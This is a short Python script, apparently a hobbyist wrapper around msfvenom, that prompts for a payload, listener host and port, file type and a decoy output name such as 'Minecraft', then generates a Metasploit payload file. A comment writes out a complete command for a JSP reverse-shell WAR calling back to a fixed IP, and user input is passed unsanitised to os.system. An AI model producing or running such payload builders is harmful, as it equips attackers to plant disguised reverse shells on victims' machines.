#! /usr/bin/python3
import os, platform
W = '\033[37m'
R = '\033[1;31m'  # red
G = '\033[1;32m'  # green
O = '\033[0;33m'  # orange
B = '\033[1;34m'  # blue
P = '\033[1;35m'  # purple
C = '\033[1;36m'  # cyan
GRs = '\033[1;37m'  # gray
sh = os.system
#msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.35 LPORT=443 -f war -o reverse.war
def banner():
    if "indow" in platform.platform():
        sh("cls")
    else:
        sh("clear")
    
    print(f"""{O}\n
┌┬┐┌─┐┌─┐  ┌─┐┬ ┬┌┬┐┌─┐
│││└─┐├┤   ├─┤│ │ │ │ │
┴ ┴└─┘└    ┴ ┴└─┘ ┴ └─┘ {R}By Mrx04Programmer{W}
""")

banner()
payload = input(f"{C}Payload: {W}")
host = input(f"{C}LHOST: {W}")
port = input(f"{C}LPORT: {W}")
ex = input(f"{B}Extension (ej: exe,jar,apk, etc): {W}")
output = input(f"{G}OUTPUT(ex: Minecraft):{W}")
banner()
print(f"{G}+ {W}generating ...")
if ex == "apk":
	command = sh("msfvenom -p "+payload+" LHOST="+host+" LPORT="+port+" R > "+output+"."+ex)
elif "apk" in ex:
	command = sh("msfvenom -p "+payload+" LHOST="+host+" LPORT="+port+" R > "+output+"."+ex)
else:
	command = sh("msfvenom -p "+payload+" LHOST="+host+" LPORT="+port+" -f "+ex+" -o "+output+"."+ex)
if command == 32512:
	print(f"{R}[-] Error, revisa los datos ingresados por favor")
if command == 0:
	print(f"{G}[INFO]{W} File Created: {P}{output}{ex}")
